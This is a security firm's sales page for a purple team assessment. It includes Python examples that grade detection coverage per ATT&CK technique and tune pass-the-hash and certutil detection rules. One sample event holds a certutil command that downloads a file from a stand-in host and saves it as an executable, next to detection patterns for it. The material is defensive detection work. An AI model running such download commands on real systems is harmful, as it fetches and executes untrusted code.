
Purple Team Assessment


Our purple team assessment unites offense and defense, testing attack scenarios and validating detection and response capabilities.

Close the gap in your detection and response coverage

Bridge the ops gap: See what works. Fix what doesn’t.

A purple team assessment is a collaborative adversarial exercise. Offensive Security Certified Professional (OSCP) and CREST Registered Penetration Tester (CRT)-certified operators execute MITRE ATT&CK-mapped techniques openly alongside your blue team. After each technique, both sides review what was detected, what was missed, and what needs tuning before moving to the next step. Unlike a red team assessment — which tests end-to-end resilience covertly — a purple team assessment is transparent by design. It is built to identify gaps in your cybersecurity defences and improve detection coverage and response workflows during the engagement itself.

Attackers dwell longest where detection coverage is weakest

Undetected intrusions result in the worst damage

In late 2024, US officials confirmed that the China-linked advanced persistent threat group Salt Typhoon had been operating inside the networks of at least nine major telecommunications providers, including AT&T, Verizon, and Lumen, for more than a year. Using living-off-the-land techniques, the attackers moved laterally through production infrastructure and reached systems used for lawful intercept, without effective detection at the critical stages of the intrusion. CISA and the FBI said the intruders had gone unnoticed in some networks for well over a year. A purple team assessment is built to surface exactly the detections that were missing in that case: lateral movement, privileged account activity, and living-off-the-land tooling, validated against your live controls before a real adversary relies on their absence.

For a mature security operations function, the question is not whether attacks can be simulated, but whether your current controls detect them consistently enough to support timely triage and response. A purple team assessment gives regulators and auditors documented, technique-level evidence of how your security controls perform, while your team closes detection gaps during the exercise rather than only after it.


How a purple team assessment improves detection coverage

Train together. Defend better. Win faster.

Based on the agreed objectives and attack scenarios, Swarmnetics works directly with your defenders in a shared test-and-tune cycle. Our operators execute techniques aligned to the MITRE ATT&CK framework, one by one, while your team validates alerting, triage, and response outcomes after each step. That lets your incident response team tune alerts, update detection rules, and refine response playbooks as the exercise runs, producing measurable gains in detection coverage instead of a post-engagement gap list alone.

Swarmnetics uses Atomic Red Team for standardised, per-technique attack simulation, Caldera for automated adversary emulation, and PowerSploit for PowerShell-based post-exploitation, including lateral movement. Testing spans five structured phases: preparation and planning, threat intelligence integration, attack execution and detection, defence analysis, and knowledge transfer. These cover threat actor profiling, mapping of your controls against the techniques in scope, and gap analysis. The objective is not to generate tool output for its own sake, but to establish which ATT&CK-mapped behaviours your team detects reliably, which detections need tuning, and where response procedures break down. The exercise leaves your organisation better able to prevent, detect, and respond to attacker behaviour, with evidence at each step.
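The execute-detect-review loop described above is easiest to reason about when each executed technique is recorded and graded against the alerts the blue team actually saw. The following Python is an added example, not Swarmnetics tooling and not part of Atomic Red Team or Caldera: it takes a list of executed ATT&CK techniques and a list of SIEM alerts, grades each technique as detected, late or missed, rolls the results up per tactic, and emits a minimal ATT&CK Navigator layer for the coverage heatmap. All technique IDs, timestamps and alert names are constructed sample data; the 15-minute triage SLA and one-hour attribution window are assumptions you would replace with your own.

```python
"""Purple-team execute-detect-review tracker (added example, not Swarmnetics tooling)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Execution:
    technique_id: str   # ATT&CK technique or sub-technique ID the operator ran
    tactic: str
    name: str
    executed_at: datetime


@dataclass(frozen=True)
class Alert:
    rule: str
    technique_id: str   # ID the detection rule is tagged with in the SIEM
    fired_at: datetime


T0 = datetime(2025, 1, 15, 10, 0)   # constructed exercise start time

# Constructed: what the red operators executed, in order, one technique at a time.
EXECUTIONS = [
    Execution("T1059.001", "execution", "PowerShell download cradle", T0),
    Execution("T1053.005", "persistence", "Scheduled task", T0 + timedelta(minutes=20)),
    Execution("T1550.002", "lateral-movement", "Pass the hash", T0 + timedelta(minutes=40)),
    Execution("T1003.001", "credential-access", "LSASS memory dump", T0 + timedelta(minutes=60)),
    Execution("T1071.004", "command-and-control", "DNS tunnelling", T0 + timedelta(minutes=80)),
]

# Constructed: what the SIEM raised during the same window.
ALERTS = [
    Alert("ps_encoded_command", "T1059.001", T0 + timedelta(minutes=2)),
    Alert("schtask_created", "T1053.005", T0 + timedelta(minutes=50)),   # fired 30 min after execution
    Alert("ntlm_keylength0", "T1550.002", T0 - timedelta(hours=1)),      # stale: fired before execution
    Alert("lsass_access", "T1003.001", T0 + timedelta(minutes=61)),
]

TRIAGE_SLA = timedelta(minutes=15)   # assumed: an alert this late is "late", not "detected"
MATCH_WINDOW = timedelta(hours=1)    # assumed: alerts outside this window are not attributed to the run


def grade(execution, alerts, sla=TRIAGE_SLA, window=MATCH_WINDOW):
    """Return (outcome, time_to_detect_seconds); outcome is 'detected', 'late' or 'missed'.

    Only alerts tagged with the same technique that fire after execution and within the
    window count, so a stale alert from before the run cannot mask a miss.
    """
    hits = [a.fired_at - execution.executed_at for a in alerts
            if a.technique_id == execution.technique_id
            and execution.executed_at <= a.fired_at <= execution.executed_at + window]
    if not hits:
        return "missed", None
    ttd = min(hits)
    return ("detected" if ttd <= sla else "late"), int(ttd.total_seconds())


def review(executions, alerts):
    """One row per executed technique: the input to the after-each-step review."""
    rows = []
    for ex in executions:
        outcome, ttd = grade(ex, alerts)
        rows.append({"technique_id": ex.technique_id, "tactic": ex.tactic,
                     "name": ex.name, "outcome": outcome, "ttd_seconds": ttd})
    return rows


def heatmap(rows):
    """Per-tactic counts of detected/late/missed: the numbers behind a coverage heatmap."""
    hm = defaultdict(lambda: {"detected": 0, "late": 0, "missed": 0})
    for r in rows:
        hm[r["tactic"]][r["outcome"]] += 1
    return dict(hm)


SCORE = {"detected": 100, "late": 50, "missed": 0}
COLOR = {"detected": "#2e7d32", "late": "#f9a825", "missed": "#c62828"}


def navigator_layer(rows, name="Purple team coverage"):
    """Minimal ATT&CK Navigator layer; the version key is an assumption, check it against your Navigator build."""
    return {
        "name": name,
        "domain": "enterprise-attack",
        "versions": {"layer": "4.5"},
        "techniques": [
            {"techniqueID": r["technique_id"], "score": SCORE[r["outcome"]],
             "color": COLOR[r["outcome"]],
             "comment": f"{r['name']}: {r['outcome']}"
                        + (f" in {r['ttd_seconds']}s" if r["ttd_seconds"] is not None else "")}
            for r in rows
        ],
    }


if __name__ == "__main__":
    import json
    rows = review(EXECUTIONS, ALERTS)
    for r in rows:
        print(f"{r['technique_id']:<10} {r['tactic']:<22} {r['outcome']:<9} {r['ttd_seconds']}")
    print(heatmap(rows))
    print(json.dumps(navigator_layer(rows), indent=2))
```

Run it and the table shows the pass-the-hash and DNS tunnelling steps as missed and the scheduled task as late; those three rows are what the two teams tune before the next technique, and re-running the same data after a rule change shows whether the tuning worked.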

Yes, we are CREST accredited

Our core team is based in Singapore and consists of CREST-certified penetration testers who also hold the Offensive Security Certified Professional (OSCP) certification. The team has delivered numerous penetration testing projects for customers in Singapore and other locations, from large multinational enterprises to small and medium businesses, across a range of industries.


Purple team assessment: controls under test

Because the best lessons come under pressure

A purple team assessment evaluates your ability to prevent, detect, and respond across:

  • Initial access techniques: exploitation of public-facing systems and valid account abuse
  • Persistence mechanisms: scheduled tasks, registry modifications, and backdoor implants
  • Privilege escalation across local and domain boundaries
  • Lateral movement via remote services, pass-the-hash, and trust exploitation
  • Defence evasion: living-off-the-land binaries, log tampering, and anti-forensic techniques
  • Credential access through memory dumping and network credential interception
  • Command and control patterns, including DNS tunnelling and encrypted channels
  • Data exfiltration controls and data loss prevention monitoring, including weaknesses in egress paths

Across these techniques, the assessment tests not only whether controls exist, but whether they generate usable detections, support analyst decision-making, and improve response effectiveness under realistic conditions.
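Two of the technique families listed above, pass-the-hash and living-off-the-land binaries, are good illustrations of why a detection that exists is not the same as a detection that is usable. The Python below is an added example, not Swarmnetics or Sigma code: it runs a first-pass pass-the-hash rule and a tuned one over constructed, flattened Windows Security (4624) and Sysmon (Event 1) fields, plus a certutil download-cradle rule, and scores each rule by true positives, false positives and false negatives. The pass-the-hash heuristics (LogonType 9 with the seclogo logon process on the source host, and LogonType 3 NtLmSsp logons with KeyLength 0 on the target, excluding null sessions and machine accounts) follow widely published detection guidance; the events, host names and account names are constructed.

```python
"""Detection rule tuning over constructed Windows events (added example, not Swarmnetics code)."""

# Constructed events. "technique" is the ground-truth label for scoring; None means benign.
EVENTS = [
    # benign interactive logon
    {"host": "WS01", "EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "Negotiate",
     "LogonProcessName": "User32", "TargetUserName": "alice", "KeyLength": 0, "technique": None},
    # benign NTLM network logon to a file share: a good rule must not fire here
    {"host": "FS01", "EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "TargetUserName": "bob", "KeyLength": 128, "technique": None},
    # null-session noise: must not fire either
    {"host": "FS01", "EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "TargetUserName": "ANONYMOUS LOGON", "KeyLength": 0, "technique": None},
    # pass-the-hash, source host: new logon session created with an injected hash
    {"host": "WS01", "EventID": 4624, "LogonType": 9, "AuthenticationPackageName": "Negotiate",
     "LogonProcessName": "seclogo", "TargetUserName": "alice", "KeyLength": 0, "technique": "T1550.002"},
    # pass-the-hash, target host: NTLM network logon with no session key negotiated
    {"host": "FS01", "EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "TargetUserName": "svc_backup", "KeyLength": 0, "technique": "T1550.002"},
    # living-off-the-land download cradle (Sysmon process creation)
    {"host": "WS01", "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://10.0.0.5/a.txt a.exe", "technique": "T1105"},
    # benign certutil use: must not fire
    {"host": "WS02", "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -store My", "technique": None},
]


def pth_v1(e):
    """First pass: any NTLM network logon. Too broad: ordinary SMB access also uses NTLM."""
    return e["EventID"] == 4624 and e["LogonType"] == 3 and e["AuthenticationPackageName"] == "NTLM"


def pth_v2(e):
    """Tuned after review: source-side seclogo pattern, or target-side NTLM logon with
    KeyLength 0, minus null sessions and machine accounts."""
    if e["EventID"] != 4624:
        return False
    source = (e["LogonType"] == 9 and e["LogonProcessName"] == "seclogo"
              and e["AuthenticationPackageName"] == "Negotiate")
    target = (e["LogonType"] == 3 and e["LogonProcessName"] == "NtLmSsp" and e["KeyLength"] == 0
              and e["TargetUserName"] != "ANONYMOUS LOGON" and not e["TargetUserName"].endswith("$"))
    return source or target


def certutil_download(e):
    """certutil used as a downloader or decoder rather than for certificate management."""
    if e["EventID"] != 1 or not e["Image"].lower().endswith("\\certutil.exe"):
        return False
    cmd = e["CommandLine"].lower()
    return any(flag in cmd for flag in ("-urlcache", "-decode", "-encode", "-verifyctl"))


def evaluate(rule, events, technique):
    """Score a rule against labelled events: (true positives, false positives, false negatives)."""
    tp = fp = fn = 0
    for e in events:
        fired = rule(e)
        is_target = e["technique"] == technique
        if fired and is_target:
            tp += 1
        elif fired and not is_target:
            fp += 1
        elif not fired and is_target:
            fn += 1
    return tp, fp, fn


if __name__ == "__main__":
    for label, rule, tid in (("pth_v1", pth_v1, "T1550.002"),
                             ("pth_v2", pth_v2, "T1550.002"),
                             ("certutil_download", certutil_download, "T1105")):
        tp, fp, fn = evaluate(rule, EVENTS, tid)
        print(f"{label:<18} {tid:<10} TP={tp} FP={fp} FN={fn}")
```

The first-pass rule catches the target-side logon but also fires on every ordinary NTLM share access and on null sessions, and it misses the source-side session entirely; after the review step the tuned rule catches both halves of the technique with no false positives on this sample. That before-and-after score, recorded per technique, is the measurable gain the exercise is meant to produce.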

FAQ

A red team assessment is covert: Swarmnetics operates without alerting your blue team, testing whether your organisation detects a sustained attack. A purple team assessment is transparent. It brings red and blue teams together to execute MITRE ATT&CK techniques openly, so your security team can tune alerts and improve playbooks during the engagement rather than after it.

Swarmnetics tests techniques from across the MITRE ATT&CK Enterprise Matrix, including initial access, persistence, privilege escalation, lateral movement, defence evasion, credential access, command and control, and exfiltration. Both teams agree the specific techniques in scope during planning, based on your threat profile and the maturity of your current detection and response controls.

A purple team assessment requires active participation from your blue team throughout the assessment phase. Your analysts monitor detection tools while Swarmnetics executes each MITRE ATT&CK technique. Both teams then review the detection outcome before moving to the next step. This execute-detect-review loop drives measurable improvement in detection coverage across the techniques tested.

Attackers who establish persistence and move laterally undetected can reach critical systems, harvest credentials, and maintain access for months. The techniques that produce the longest dwell times are precisely those a purple team assessment surfaces and validates against your live detection controls.

A purple team assessment from Swarmnetics produces a draft report for your review, followed by a final report upon acceptance. The report includes an executive summary, a detailed MITRE ATT&CK coverage heatmap showing detection successes, failures, and response gaps identified during the collaborative exercise, and specific recommendations for strengthening your security controls and processes. The report maps every tested technique to your current detection and response capability, providing a clear prioritised improvement roadmap. After you have addressed the findings, Swarmnetics is available to discuss remediation priorities and support implementation planning.

A purple team assessment is relevant to any organisation that wants to identify specific gaps in its detection and response capabilities against defined MITRE ATT&CK techniques. It is particularly valuable for organisations subject to regulatory, contractual, or industry security requirements that call for validation of control effectiveness through realistic adversarial testing. Swarmnetics recommends a purple team assessment for organisations that have completed foundational security assessments and are ready to test their controls and response capabilities against realistic threats.

The duration of a purple team assessment depends on the number of MITRE ATT&CK techniques in scope and the depth of the collaborative testing sessions. A typical purple team assessment runs for two to four weeks of collaborative testing, followed by a draft report within five business days for your review.

A purple team assessment directly supports compliance with applicable regulatory, contractual, or industry security obligations to validate the effectiveness of detection and response capabilities against realistic threats. It provides documented evidence of detection and response capability assessment against defined threat techniques that regulators and auditors may request.

Every purple team assessment follows a three-phase process. In the planning phase, Swarmnetics agrees the objectives, scenarios, and schedule with your team. In the assessment phase, our consultants execute MITRE ATT&CK techniques collaboratively with your blue team, providing real-time feedback on detection and response effectiveness after each technique. In the reporting phase, we deliver a draft report for review and a final report with specific, prioritised recommendations.

All Swarmnetics adversarial emulation engagements are conducted by our Singapore-based team of security consultants holding the Offensive Security Certified Professional (OSCP) and CREST Registered Penetration Tester (CRT) credentials. Swarmnetics has been delivering technical security assessments to organisations across Singapore since 2015 and serves as a trusted VAPT partner for leading enterprises across technology, telecommunications, and professional services.